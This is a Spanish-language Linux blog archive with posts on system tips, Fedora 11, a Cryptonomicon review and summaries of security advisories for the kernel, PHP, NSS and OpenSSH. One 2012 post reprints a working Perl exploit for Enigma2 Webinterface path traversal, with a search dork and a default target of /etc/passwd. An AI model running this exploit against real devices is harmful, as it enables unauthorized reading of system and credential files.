Mostrando las entradas con la etiqueta Linux. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Linux. Mostrar todas las entradas

lunes, 25 de abril de 2016

Comandos linux para monitorear el sistema operativo (link)

De ccm.net se listan 8 comandos útiles para monitorear el sistema operativo.

http://es.ccm.net/faq/3435-linux-comandos-para-monitorear-el-sistema

lunes, 18 de marzo de 2013

Tip: Cómo aumentar el rendimiento de tu PC/Servidor al instante

¿Tu equipo está ejecutando un proceso y éste la vuelve extremadamente lenta, necesitas continuar utilizando el equipo y también continuar ejecutando el proceso?

Bueno, bajo estas circunstancias normalmente la opción más natural sería terminar el proceso, sin embargo, ésto podría obtener resultados no deseados. 

Para solucionar este problema, los sistemas operativos ofrecen la posibilidad de asignar quotas de uso de CPU a ciertos procesos. 

Lo más recomendable es reducir la prioridad del proceso para que no consuma la totalidad del CPU y así continuar operando el equipo, claro está que el proceso tardará más tiempo en terminar su tarea.

Para asignar la prioridad de cada uno de los procesos que se ejecutan en el equipo es necesario contar con los permisos para ello, y en cada sistema operativo varía.



Windows XP Profesional

Para Windows XP Profesional, el administrador de tareas permite asignar el nivel de prioridad a cada proceso mediante el uso de un menu contextual, como se muestra en la imagen anterior.

En linux, para cambiar la prioridad de un proceso que se está ejecutando se utiliza el comandi renice pero se debe contar con privilegios de root, para administrar el sistema. Para complementar el uso de este comando, consultar los comandos nice, top y ps. Veamos un ejemplo del comando renice.

#renice -1 -p 2504 

donde renice es el comando para reasignar el uso de cpu.
+1 es para asignar más o menos prioridad, el límite es 20.
-p 2504 es el identificador del proceso, éste se puede obtener con el comando top, ps -l, etc.

Sin duda, el uso de CPU toma su mayor importancia cuando se ejecutan procesos más pesados para el sistema.


Relacionados:
http://www.manpagez.com/man/8/renice/


lunes, 9 de enero de 2012

Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure

#!/usr/bin/perl
#
# Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
##
# Author: Todor Donev
# Email me: todor.donev@@gmail.com
# Platform: Linux
# Type: remote
##
# Gewgle Dork: "Enigma2 movielist" filetype:rss
##
#
# Enigma2 is a framebuffer-based zapping application (GUI) for linux.
# It's targeted to real set-top-boxes, but would also work on regular PCs.
# Enigma2 is based on the Python programming language with a backend
# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
#
# Enigma2 can also be controlled via an Enigma2:WebInterface.
##
# Thanks to Tsvetelina Emirska !!
##
use LWP::Simple;
$t = $ARGV[0];
if(! $t) {usg();}
$d = $ARGV[1];
if(! $d) {$d = "/etc/passwd";}
my $r = get("http://$t/web/about") or exit;
print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Target: $t\n";
if ($r =~ m/(.*)<\/e2webifversion>/g){
print "[+] Image Version: $1\n";
}
if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){
print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";
result(exploit1());
}
if ($r =~ (m/1.5rc1|1.5beta4/i)){
print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";
result(exploit2());
}
sub usg{
print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Usage: perl enigma2.pl \n";
exit;
}
sub exploit1{
my $x = get("http://$t/file?file=$d");
}
sub exploit2{
my $x = get("http://$t/file/?file=../../../..$d");
}
sub result{
my $x= shift;
while(defined $x){
print "$x\n";
print "[+] I got it 4 cheap.. =)\n";
exit;
}}

miércoles, 6 de julio de 2011

Grave fallo de seguridad en OpenSSH de FreeBSD, descubierto siete años después

Kingcope ha vuelto a hacer públicos todos los detalles de un grave fallo de seguridad en OpenSSH de FreeBSD 4, que permite ejecución remota de código. Ha creado un exploit capaz de aprovechar el fallo, y que devuelve una shell al equipo remoto sin necesidad de autenticación. El fallo se encuentra en auth2-pam-freebsd.c, un archivo de hace siete años.

El problema es grave, puesto que permite a un atacante que pueda acceder al SSH de una máquina FreeBSD, ejecutar código como root sin necesidad de autenticarse. El fallo se da en, al menos en FreeBSD 4.9 y 4.11, puesto que estas versiones vienen con OpenSSH 3.5p1 por defecto. Actualmente FreeBSD mantiene solo dos ramas, la 7 y la 8. La rama 4 se descontinuó en 2007 y el fichero problemático desapareció de FreeBSD a partir de la versión 5.2.1.

El problema está en la función pam_thread, a la hora de procesar nombres de usuario muy largos. Tanto SSH versión 1 como SSH versión 2. En versiones más modernas de FreeBSD 5.2.1, ni siquiera existe el archivo afectado auth2-pam-freebsd.c. Kingcope no ha podido determinar aún si el problema está en este OpenSSH de FreeBSD o en la propia librería PAM del sistema operativo.

Durante las pruebas, Kingcope comprobó que si lanzaba el demonio SSH desde consola como root, y proporcionaba un nombre de usuario de más de 100 caracteres de longitud, el demonio moría y se sobrescribía el registro EIP, con lo que se puede llegar a controlar por completo el flujo de instrucciones.

Kingcope (Nikolaos Rangos) suele descubrir importantes vulnerabilidades en FreeBSD y otro software popular. A finales de 2009 encontró un problema de elevación de privilegios FreeBSD. En septiembre de ese mismo año, publicó un exploit funcional que permitía a un atacante ejecutar código con permisos de SYSTEM en un servidor IIS 5.x (Internet Information Services) siempre que tuviera el FTP habilitado y accesible. En la versión 6.x, el exploit sólo permitía provocar una denegación de servicio. También en mayo de 2009, descubrió un grave fallo en WebDAV de IIS.


Más Información:

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
http://packetstormsecurity.org/files/view/102683/ssh_preauth_freebsd.txt

01/09/2009 Vulnerabilidad en el FTP de Microsoft IIS 5 permite ejecución de código
www.hispasec.com/unaaldia/3965

30/11/2009 Elevación de privilegios en FreeBSD
www.hispasec.com/unaaldia/4055

miércoles, 11 de mayo de 2011

Akonadi Control Process not registered at D-Bus


Hola a todos, espero que hayan pasado un excelente 10 de mayo.

El tema del día de hoy, es cómo resolver éste error que se me presentó durante bastante tiempo y no le di importancia porque no utilizaba muchas de las aplicaciones de KDE.

Pero bueno, aqui les muestro una captura de pantalla del problema.

Al iniciar Slackware 13.1 arrancaban también diversas aplicaciones de kde, sin embargo se moestraba este error:

Akonadi Control Process not registered at D-Bus

Y para poder corregirlo, basta con hacer lo siguiente:


Agrega la linea

"user=root" en el archivo de configuración local mysql de Akonadi (por ejemplo, esta /root/.local/share/akonadi//mysql.conf), y el servidor de Akonadi puede iniciar perfectamente.

Espero que les haya servido, saludos!

miércoles, 23 de marzo de 2011

Revelación de información en el Kernel Linux 2.6.x

Revelación de información en el Kernel Linux 2.6.x

Se han publicado tres vulnerabilidades en el kernel de Linux que podrían ser aprovechadas para revelar información sensible a un atacante.

* CVE-2011-1170
Un error al no terminar determinadas estructuras en las funciones 'compat_do_replace', 'do_replace' y 'do_arpt_get_ctl', localizadas en el fichero 'net/ipv4/netfilter/arp_tables.c', podría permitir a un atacante local acceder a información del sistema.

* CVE-2011-1171
Un error al no terminar determinadas estructuras en las funciones 'compat_do_replace', 'do_replace' y 'do_arpt_get_ctl', localizadas en el fichero 'net/ipv4/netfilter/ip_tables.c', podría permitir a un atacante local acceder a información del sistema.

* CVE-2011-1172
Un error al no terminar determinadas estructuras en las funciones 'compat_do_replace', 'do_replace' y 'do_arpt_get_ctl', localizadas en el fichero 'net/ipv4/netfilter/arp_tables.c', podría permitir a un atacante local acceder a información del sistema.

Es obvio que se trata de la introducción del mismo error en a lo largo del código fuente. El problema radica en que no se comprueba la terminación "\x00" de las cadenas de las estructuras de datos, por lo que la solución propuesta, común a las tres vulnerabilidades consiste en el forzado de dicha terminación en las cadenas de texto de las estructuras.

Se observa en las lineas introducidas del parche:

tmp.name[sizeof(tmp.name)-1] = 0;
rev.name[sizeof(rev.name)-1] = 0;

Hay que destacar que para poder explotar esta vulnerabilidad, es necesario que la funcionalidad CAP_NET_ADMIN se encuentre habilitada.

Sirve para administrar interfaces de red, modificar las tablas de ruta, establecer el modo promiscuo, etc.

netfilter: ip_tables: fix infoleak to userspace
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=78b79876761b86653df89c48a7010b5cbd41a84a

ipv6: netfilter: ip6_tables: fix infoleak to userspace
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=6a8ab060779779de8aea92ce3337ca348f973f54

netfilter: arp_tables: fix infoleak to userspace
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=42eab94fff18cb1091d3501cd284d6bd6cc9c143

martes, 8 de marzo de 2011

Actualización de subversion para Debian Linux

Debian ha publicado una actualización del paquete subversion que soluciona una vulnerabilidad que podría permitir a un atacante remoto causar un ataque de denegación de servicio haciendo que la aplicación deje de responder.

Subversion es un popular sistema de control de versiones con licencia Apache.

El error reside en la función 'svn_fs_get_access' al devolver un puntero nulo cuando procesa un comando 'lock' si éste es enviado por un usuario no autenticado.

Un atacante remoto no autenticado podría causar una denegación de servicio a través del envío de comandos especialmente manipulados.

La vulnerabilidad solo puede ser explotada cuando subversion funciona a través del servidor Apache HTTPD cuando los usuarios no autenticados tienen acceso de lectura.

El fallo fue notificado por Philip Martin de la empresa WANdisco y tiene asignado el CVE-2011-0715.



Más Información:

DSA-2181-1 subversion -- denial of service
http://www.debian.org/security/2011/dsa-2181

jueves, 3 de marzo de 2011

Actualización del kernel para Red Hat Enterprise Linux 5

Red Hat ha publicado una actualización del kernel para la versión 5 de su gama Enterprise Linux Server y Desktop.

La actualización corrige tres fallos de seguridad que podrían permitir a un atacante provocar una denegación de servicio y obtener información sensible.

Por orden de CVE asignado las vulnerabilidades corregidas son:

CVE-2010-4249:
Existe un error en la función 'wait_for_unix_gc function' de 'net/unix/garbage.c' al no seleccionar correctamente los tiempos de recolección de basura (liberación de memoria). Esto podría ser usado por un atacante local para provocar una denegación de servicio a través de las llamadas al sistema 'socketpair' y 'sendmsg' para sockets 'SOCK_SEQPACKET'.
Fallo reportado por Vegard Nossum.

CVE-2010-4251:

Existe un error en la función '__release_sock' cuando el número de paquetes recibidos excede la capacidad de memoria reservada para su cacheo. Un atacante remoto podría causar una denegación de servicio a través del envío masivo de paquetes.

CVE-2010-4655:

Existe un error de inicialización en la función 'ethtool_get_regs' que podría permitir a un atacante local provocar una revelación de información a través de vectores no especificados.
Fallo reportado por Kees Cook.

Adicionalmente la actualización corrige múltiples fallos y aporta mejoras no relacionadas con la seguridad.
Esta actualización está disponible a través de Red Hat Network.



Más Información:

Red Hat: kernel security and bug fix update
http://rhn.redhat.com/errata/RHSA-2011-0303.html

Extracto de Hispasec

lunes, 20 de diciembre de 2010

Elevación de privilegios a través de ACPI en kernel Linux 2.6.x, calificada de "locura"

Dave Jones ha descubierto un fallo en los permisos del fichero '/sys/kernel/debug/acpi/custom_method' que podría permitir a un usuario local llevar a cabo una elevación de privilegios a través de la modificación de las llamadas a métodos ACPI. El propio descubridor ha calificado de "locura" los permisos asignados a ese archivo.

ACPI es un estándar que controla el funcionamiento del BIOS y proporciona mecanismos avanzados para la gestión y ahorro de la energía convirtiendo, por ejemplo, la pulsación del botón de apagado en un simple evento. Así, el sistema operativo puede detectarlo y permitir efectuar un apagado ordenado de la máquina, sin riesgo para el hardware (como ocurría anteriormente).

El fallo se da en que el archivo

/sys/kernel/debug/acpi/custom_method

actualmente tiene permisos de escritura para todos los usuarios del equipo, independientemente de sus permisos. Esto permitiría que elevaran privilegios a root de forma sencilla. El propio descubridor escribe en una nota del GIT.

"Currently we have:

--w--w--w-. 1 root root 0 2010-11-11 14:56
/sys/kernel/debug/acpi/custom_method

which is just crazy. Change this to --w-------."

Para corregir el fallo basta con cambiar los permisos del fichero habilitando exclusivamente la escritura para el usuario root.

El fallo ha sido corregido en el repositorio de código del kernel y su CVE asignado es CVE-2010-4347.


Más Información:

CVE-2010-4347 kernel: local privilege escalation via
/sys/kernel/debug/acpi/custom_method
https://bugzilla.redhat.com/show_bug.cgi?id=663542

ACPI: debugfs custom_method open to non-root
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;h=ed3aada1bf34c5a9e98af167f125f8a740fc726a

Advanced Configuration and Power Interface (ACPI)
http://es.wikipedia.org/wiki/Advanced_Configuration_and_Power_Interface

domingo, 5 de diciembre de 2010

Actualización de php para Red Hat Enterprise Linux 4 y 5

Red Hat ha publicado una actualización de php que corrige múltiples fallos de seguridad. Estos errores podrían permitir a un atacante remoto causar ataques de cross-site scripting, inyección de parámetros o causar una denegación de servicio entre otros.

php es un popular lenguaje dinámico usado principalmente para programación web.

Los fallos corregidos, por orden de CVE, son los siguientes:

CVE-2009-5016 y CVE-2010-3870: Existe un error de truncamiento y falta de validación en la función 'utf8_decode' cuando decodifica secuencias multi-byte. Esto podría ser usado por un atacante remoto para causar ataques de cross-site scripting a través de una página web especialmente manipulada.

CVE-2010-0397: Existe un error al manejar los argumentos de la función 'xmlrpc_decode_request' de la extensión 'xmlrpc' que podría provocar una dereferencia de puntero nulo. Esto podría ser aprovechado por un atacante independiente de contexto para causar una denegación de servicio a través de una llamada a 'xmlrpc_decode_request' especialmente manipulada.

CVE-2010-1128: Existe un error no especificado en 'session extension' ue podría permitir a un atacante remoto eludir restricciones (open_basedir y safe_mode) a través de vectores no especificados.

CVE-2010-1917: Existe un desbordamiento de memoria intermedia basado en pila en la función fnmatch. Esto podría ser aprovechado por un atacante remoto para causar una denegación de servicio a través de la manipulación del primer argumento de la función fnmatch.

CVE-2010-2531: Existe un error no especifcado en var_export que podría permitir una fuga de datos en memoria.

CVE-2010-3065: Existe un error en el serializador por defecto de PHP al manejar incorrectamente el carácter PS_UNDEF_MARKER. Esto podría permitir a un atacante remoto inyectar código arbitrario a través de un inicio de sesión manipulando la petición POST.

Esta actualización está disponible a través de Red Hat Network.

extracto original de: hispasec.com

jueves, 23 de septiembre de 2010

Error de regresión en el kernel Linux resucita una elevación de privilegios

El investigador de seguridad Ben Hawkes se hallaba diseccionando el modo de compatibilidad del kernel Linux de 64 bits para aplicaciones de 32 cuando dio con algo que llamó su atención:

En el 2007 fue publicada una vulnerabilidad que permitía elevar privilegios en el kernel Linux de 64 bits. El problema residía en el archivo 'arch/x86_64/ia32/ia32entry.S', dentro de un procedimiento para emular las llamadas de la arquitectura de 32 bits.

Dicho procedimiento usa el registro eax como índice a una tabla donde están las llamadas del sistema correspondientes a IA32 y comprueba que eax está dentro de los límites de la tabla. Si es así llama a la macro IA32_ARG_FIXUP que realizará una conversión de registros de 64 bits a registros de 32.

Finalmente se realiza la llamada a través de ia32_sys_call_table pero usando el registro 'rax' completo y sin comprobar. Esto permite, si podemos controlar 'rax', efectuar llamadas a direcciones fuera de la tabla de llamadas y con privilegios del sistema (elevación de privilegios).

Dicho fallo, originalmente descubierto por Wojciech Purczynski, fue corregido añadiendo la macro LOAD_ARGS32 para cargar de manera segura los registros previniendo su explotación. En su día fue publicado el exploit correspondiente y se asignó el CVE-2007-4573 a la vulnerabilidad.

Lo que Ben observó fue que en las nuevas versiones del kernel, los desarroladores habían eliminado una linea concreta de la macro LOAD_ARGS32: "movl \offset+72(%rsp),%eax".

Curiosamente se trata de la que efectuaba una asignación segura del valor de 'eax'. Esto puede verse en el commit correspondiente del repositorio del kernel.

De nuevo la vulnerabilidad estaba viva. Ben se lo comunicó a Robert Swiecki, quien creo el exploit original y el cual sólo tuvo que modificarlo para que fuese funcional una vez más.

El fallo ha sido nuevamente parcheado y asignado el CVE-2010-3301.


Más Información:

linux compat vulns (part 2)
http://sota.gen.nz/compat2/

isec-0025-syscall-emulation
http://isec.pl/vulnerabilities/isec-0025-syscall-emulation.txt

CVE-2010-3301 kernel: IA32 System Call Entry Point Vulnerability
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-3301

jueves, 19 de agosto de 2010

Corregido un interesante (y peligroso) fallo en el kernel Linux 2.6



Recientemente se ha parcheado una vulnerabilidad en el kernel Linux, rama 2.6, que podría permitir a un atacante elevar privilegios y ejecutar código arbitrario con permisos de root.

La vulnerabilidad ha sido descubierta por Rafal Wojtczuk de Invisible Things Labs, la empresa de la conocida investigadora Joanna Rutkowska. Rafal descubrió el bug mientras estaba trabajando en la virtualización de la interfaz de usuario del sistema operativo Qubes.

Qubes es el proyecto más ambicioso de Rutkowska, un sistema operativo que permite virtualizar procesos independientemente.

Según Rutkowska el bug descubierto podría haber estado ya presente desde la introducción de la rama 2.6 a finales de 2003. Aunque en un primer momento los investigadores reportaron el error a los desarrolladores del servidor X (X.org) finalmente se derivó a los mantenedores del kernel. Esto fue debido a que no se trataba de un fallo inherente al servidor X sino a la forma en la que el kernel maneja la memoria en determinadas circunstancias.

La explotación de la vulnerabilidad permitiría a cualquier proceso no privilegiado con acceso al servidor X escalar a root. De facto los procesos de usuario que posean GUI corren con acceso al servidor X y de ahí que, como teoriza Rutkowska, la explotación de una vulnerabilidad no relacionada en una aplicación de usuario podría ser encadenada y aprovechar ésta para elevar privilegios. La puerta a una ejecución remota de código queda abierta.

Técnicamente la explotación del bug reside en cargar de forma reiterativa en memoria pixmaps (XPM) de gran tamaño aumentando así el área de memoria mapeada.

Gracias a la extensión MIT-SHM del servidor X, se posibilita y se crea un segmento de memoria compartida que será usado por el proceso del servidor X.

La idea es aumentar el tamaño de memoria mapeada y seguidamente llamar a una función recursiva que vaya creando marcos de pila llevando el segmento de pila hacia la zona de memoria compartida, ya de por sí en direcciones altas debido a la expansión de la memoria mapeada usada a alojar los pixmaps.

Durante ese instante, el puntero de pila ha llegado a la zona de memoria compartida y el atacante obtiene el control de la pila ya que puede escribir en esa área posibilitando de ésta forma la ejecución de código arbitrario.

El fallo ha sido corregido en el repositorio de código del kernel y su CVE asignado es CVE-2010-2240.

Más Información:

Skeletons Hidden in the Linux Closet: r00ting your Linux Desktop for Fun and Profit
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html

Exploiting large memory management vulnerabilities in Xorg server running on Linux
http://www.invisiblethingslab.com/resources/misc-2010/xorg-large-memory-attacks.pdf

via hispasec

domingo, 7 de marzo de 2010

Jaulas Chroot

Wn este artículo se dará una explicación del funcionamiento de las Jaulas Chroot centrados en el sistema operativo Linux. Muy útiles para mejorar el aspecto de la seguridad de los sistemas, les dejo el enlace a elhacker.

Nos vemos

domingo, 3 de enero de 2010

Un regalo de reyes: Neal Stephenson - El codigo enigma o criptonomicon


Criptonomicón


Criptonomicón es una novela escrita por Neal Stephenson más cercana a la ficción histórica y a las novelas de acción tecnológica contemporáneas que a la ciencia ficción que suele desarrollar este escritor. Se desarrolla en dos líneas temporales paralelas: la de los criptógrafos de la Segunda Guerra Mundial que intentan romper los códigos de comunicaciones del Eje Roma-Berlín-Tokio (ver U-413, U-553, U-691, Máquina Enigma, Alan Turing, Bletchley Park), y la de sus descendientes, que intentan utilizar la criptografía moderna para construir un paraíso de datos en un estado insular ficticio del Este asiático. En ambas historias tienen especial importancia las maquinaciones políticas que implican ambos esfuerzos.


El título proviene indirectamente del Necronomicón, una obra ficticia mencionada en las obras del escritor H. P. Lovecraft, aunque cuando Stephenson eligió el título no conocía el origen de la palabra, sino que fue inspirada por la aparición del Necronomicón en la serie de comedias de horror de El ejército de las tinieblas (Evil Dead).
Algunas partes de Criptonomicón puede ser notablemente pesadas para lectores no técnicos, ya que emplea múltiples páginas en explicar detalladamente conceptos criptográficos e informáticos. A pesar de los detalles técnicos el libro tuvo la admiración de sus seguidores, críticos literarios y lectores.
La primera edición la llevó a cabo la editorial estadounidense Eos el 4 de mayo de 1999, bajo el título original Criptonomicón en un único volumen de 918 páginas. La editorial española Ediciones B se responsabilizó de la versión española de la colección Nova y Byblos, cuya traducción se presenta en tres volúmenes subtitulados El Código Enigma, de 455 páginas, El Código Pontifex de 494 páginas y El Código Aretusa de 496 páginas, cortando en las páginas 320 y 620 del original estadounidense. Idéntico criterio se aplicó en la edición francesa. En el año 2007 Ediciones B publicó una edición de lujo, tapa dura con sobrecubiertas, en un solo volumen de 864 páginas.


La obra ha sido galardonada con el premio Locus 2000 como Libro de culto de los Hackers. Según algunos críticos, el Criptonomicón de Stephenson es a la criptografía y al cyberpunk de la sociedad de la información lo que El Señor de los Anillos de JRR Tolkien a la magia y la fantasía.


El Criptonomicón, descrito como la «Biblia del criptógrafo» que aparece a lo largo de la novela, es un libro de ficción inventado por Neal Stephenson para la trama del Criptonomicón y no existe en la realidad.
Stephenson incluye, como parte del argumento, una precisa descripción de (y un script en Perl para) el cifrado Solitario (llamado Pontifex en el libro), un algoritmo criptográfico desarrollado por Bruce Schneier y que se ejecuta mediante una baraja de cartas.


El trasfondo infotecnológico de Criptonomicón es la criptografía y las matemáticas y el uso que se hacen de ellas en las dos tramas que se van compaginando a lo largo de la novela y que se centran en el marco histórico de la Segunda Guerra Mundial y en un presente paralelo al que vivimos actualmente. La principal aplicación que se da en la trama histórica será la ruptura de los códigos utilizados por los alemanes y japoneses sin que estos se den cuenta, mientras que en el presente se intenta crear la Cripta, un paraíso informático de datos libres del poder de los gobiernos.


En la trama que tiene transcurso durante la Segunda Guerra Mundial se nos presenta a Lawrence Pritchard Waterhouse, un ficticio genio matemático y criptoanalista especializado en descifrar códigos del enemigo. Junto a él tenemos a Bobby Shaftoe, un sargento de la infantería de marina estadounidense adicto a la morfina con amplia experiencia en el frente del Pacífico que acaba en la secreta compañía 2702 junto al misterioso teniente–sacerdote Enoch Root, una compañía dedicada a despistar al enemigo con el fin de que no sospechase que se habían roto sus códigos. Después de muchas anécdotas, Waterhouse acabara casándose con una qwghlmiana; Shaftoe volverá a Filipinas junto al general MacArthur, personaje real, y a su amigo japonés Goto Dengo, para fallecer en su última misión días después de conocer a su hijo; y Enoch Root de la Societas Eruditorum simulará su propia muerte y regresará a Filipinas en busca de una mina nipona.
A lo largo de esta trama aparecen varios personajes y sitios históricos relevantes, y componentes de ficción como el propio Criptonomicón, un libro de los aliados de la Segunda Guerra Mundial que se usaba como repositorio de información para descifrar los códigos del Eje; el Reino de Qwghlm, perteneciente al Reino Unido, o el sultanato de Kinakuta.


La segunda trama tiene lugar en un presente paralelo, en el cual sesenta años después Randy Waterhouse, nieto de Lawrence y experto hacker criptográfico deja el mundo informático californiano para embarcarse en un desafiante proyecto empresarial junto a sus compañeros de Epiphyte Corporation con la finalidad de la crear la Cripta, un paraíso fiscal y de la información, pero tendrá que enfrentarse a viejos enemigos como Andrew Loeb, a otros nuevos como "el Dentista" y a la maquinaria política de los gobiernos. Para ello contará con la ayuda de sus viejos amigos Avi, Eb, John, Tom y Beryl y con la del equipo de la Semper Marine Services, que componen Doug y Amy Shaftoe, hijo y nieta de Bobby. Para respaldar la moneda electrónica de la Cripta será necesario conseguir oro, y necesitarán la ayuda de la compañía de excavaciones GOTO de Goto Dengo, quien construyó el "Gólgota" japonés, donde se guardó todo el tesoro obtenido como botín de guerra japonés durante la segunda guerra mundial. Además, Avi tiene otra misión para la Cripta: alojar el PEPH, el Paquete de Educación y Prevención del Holocausto, con el fin de ofrecer a la humanidad el conocimiento suficiente para la supervivencia. De esta trama cabe destacar la reaparición de Enoch Root, quien ayuda y apoya a Randy en la tarea de descifrado del código Aretusa durante su periodo de encarcelamiento en Filipinas y le enseña el método de cifrado del Solitario, o Pontifex, comentado más arriba.



Realidad en el Criptonomicón



El Criptonomicón utiliza un marco real como escenario de su historia. Así aparecen personajes, lugares y objetos de notable importancia histórica (algunos toman parte activa de la trama y otros simplemente son nombrados). Aquí hay una lista:


Alan Turing
Douglas MacArthur
John Von Neumann
Isoroku Yamamoto
Winston Churchill
Theodore Roosevelt
Máquina de Turing
Máquina Enigma
Colossus
Bletchley Park
Linux (en éste caso el autor utiliza el sobrenombre Finux para referirse a él)
BeOS
Microsoft (y Windows)


sábado, 29 de agosto de 2009

Linux contra Windows 7


Free Software Foundation lanza el sitio “Windows7Sins.org” y acusa a Microsoft de invadir la privacidad de los usuarios

La FSF, una asociación que defiende los derechos de los internautas en la red, considera que la nueva versión del sistema operativo de Windows que lanzará Microsoft este octubre “ejecuta” aplicaciones a espaldas de los propietarios del equipo.

windows7sinsEntre los pecados que acomete Windows, según la FSF, se encuentran la vinculación a los formatos propietarios de Microsoft, la baja seguridad de los productos de la multinacional, la integración de sistemas de protección de derechos de autor (DRM) que violan la privacidad de los usuarios.

“Ya hace algún tiempo que Windows se convirtió en una plataforma para gerenciar derechos de autor restringiendo las copias que los usuarios decidan realizar”, dijo la FSF en un comunicado.

La organización defiende que con esta actuación, Microsoft “controla al completo el uso de los ordenadores” perjudicando la libre elección de los propietarios de las maquinas.

Además del site que permitirá concienciar a los usuarios sobre las limitaciones de Windows 7, la FSF enviará una carta a los principales ejecutivos de las empresas del ranking “Fortune 500″ en la que pondrá de manifiesto las ventajas que representa para las compañías el uso de software libre en lugar de sistemas operativos propietarios

Via Noticiasdot.com

sábado, 8 de agosto de 2009

Varios errores en NSS permiten realizar spoofing de un certificado y ejecutar código arbitrario

Se han descubierto varias vulnerabilidades en la librería NSS que permiten suplantar un certificado digital y ejecutar código arbitrario.

NSS es una librería multi-plataforma usada para habilitar servicios de cifrado. NSS soporta SSL v2 y v3, TLS, certificados X.509 v3, y un largo etcétera. NSS usa una triple licencia, Mozilla, GPL y LGPL.

Dos de los errores en NSS permiten realizar spoofing de un certificado SSL.

Uno de los fallos es por no validar correctamente los datos de un certificado; en concreto cuando el valor CN de X.509 es nulo. Esto podría ser usado por un atacante remoto para realizar un ataque de hombre en el medio. (CVE-2009-2408)

X.509 es un estándar usado para las infraestructuras de clave pública (PKI); con él se permite validar a la autoridad certificadora y el sitio certificado.

El otro de los errores ha sido causado por usar certificados basados en MD2. De esta manera un atacante remoto podría suplantar un certificado creando uno especialmente manipulado para que colisionen los MD2 de ambos. (CVE-2009-2409)

MD2 es un algoritmo de cifrado optimizado para 8 bits. En 2004 se demostró que era vulnerable a ataques tipo preimagen. Un ataque de preimagen permite generar un documento arbitrario con un hash dado. En este caso, es sencillo generar un certificado falso cuyo hash coincida con un certificado legítimo.

Por último un error en el analizador de expresiones regulares de NSS provoca un desbordamiento de memoria intermedia basado en heap. Esto permitiría a un atacante remoto ejecutar código arbitrario a través de un certificado especialmente manipulado. (CVE-2009-2404)

Para poder explotar esta vulnerabilidad el certificado deberá estar firmado por una entidad confiable; de no ser así, antes de producirse este fallo debería de pedirse autorización al usuario que valide el certificado.

Más Información:

Bugzilla Red Hat:
https://bugzilla.redhat.com/show_bug.cgi?id=510251
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-2409
https://bugzilla.redhat.com/show_bug.cgi?id=512912

Network Security Service (NSS):
http://www.mozilla.org/projects/security/pki/nss/
https://developer.mozilla.org/en/NSS

Via Hispasec.com

miércoles, 17 de junio de 2009

Fedora 11


Las siguientes son las características más importantes de Fedora 11:
  • Instalación automática de fuente y tipos mime - PackageKit fue introducido en Fedora 9 como una aplicación administradora de software multi distro. La capacidad que ofrece gracias a la integración con el escritorio se hizo más visible en Fedora 10, donde dió la instalación de codecs automática. Ahora en Fedora 11, PackageKit extiende esta funcionalidad con la habilidad de instalar automáticamente fuentes donde se necesiten para ver y editar documentos. También incluye la capacidad de instalar manejadores para ciertos tipos de contenidos cuando se necesite. Todavía se están realizando trabajos para proveer la instalación automática de aplicaciones.
  • Control de Volumen - Actualmente, la gente que usa Fedora debía ir por varios niveles de mezcladores en distintas aplicaciones para configurar las fuentes de sonido. Estos están todos expuestos en el control de volumen en el escritorio, haciendo que la experiencia del usuario sea confusa. PulseAudio nos permite unificar los controles de volumen en una interfase que hace la configuración de sonido más fácil y menos dolorosa.
  • modesetting del kernel en Intel, ATI y Nvidia - Fedora 10 fue la primera distribución en venir con la característica modesetting del kernel (KMS) para agilizar el arranque gráfico. Se dijo oportunamente que en lo sucesivo se agregaría soporte a placas de video adicionales. KMS solamente estaba presente en algunas placas ATI. En Fedora 11, este trabajo se extendió para incluir muchas más placas de video, incluídas Intel y Nvidia, así como también otras ATI. Aunque todavía no se terminó, se aumentó enormemente la cobertura de placas de video de la característica KMS, con otras más por venir.
  • Huella digital - Mucho trabajo se realizó para poder usar lectores de huellas digitales como un mecanismo de autenticación. Actualmente, los lectores de huellas digitales son problemáticas, e instalar/usar fprint y su módulo pam toma más tiempo de lo que realmente debería ser necesario. El objetivo de esta característica es hacer esto más fácil, proveyendo todas las piezas necesarias en Fedora, junto con la configuración bien integrada. Para habilitar esta funcionalidad, el usuario debe registrar sus huellas en el sistema como parte de la creación de su cuenta. Después de hacerlo, podrán fácilmente ingresar y autenticar indistintamente pasando el dedo. Esto simplifica enormemente un elemento de la administración de la identidad y es un gran paso en la evolución del escritorio linux.
  • Sistema de método de entrada IBus - ibus fue rescrito en C y es el nuevo método de entrada por defecto para idiomas de Asia. Permite que los métodos de entrada se agreguen y quiten dinámicamente durante una sesión de escritorio. Soporta chino (pinyin, libchewing, tablas), indio (m17n), Japonés (anthy), coreano (libhangul) y más. Todavía faltan algunas características si se compara con scim, por lo que se pide la prueba y que se informe los problemas y sugerencias sobre mejoras.
  • Presto - Normalmente cuando actualiza un paquete en Fedora, descarga un paquete reemplazo entero. La mayor parte del tiempo (especialmente para paquetes más grandes), la mayoría de los datos actuales en el paquete actualizado es el mismo que el del paquete original, pero todavía puede terminar descargando el paquete completo. Presto le permite descargar la diferencia (llamada delta) entre el paquete que tiene instalado y el que quiere actualizar. Esto puede reducir el tamaño de descarga de las actualizaciones en un 60% – 80%. No está habilitado por defecto en este lanzamiento. Para usar esta característica debe instalar el complemento yum-presto con yum install yum-presto.
Las nuevas características disponibles incluyen:
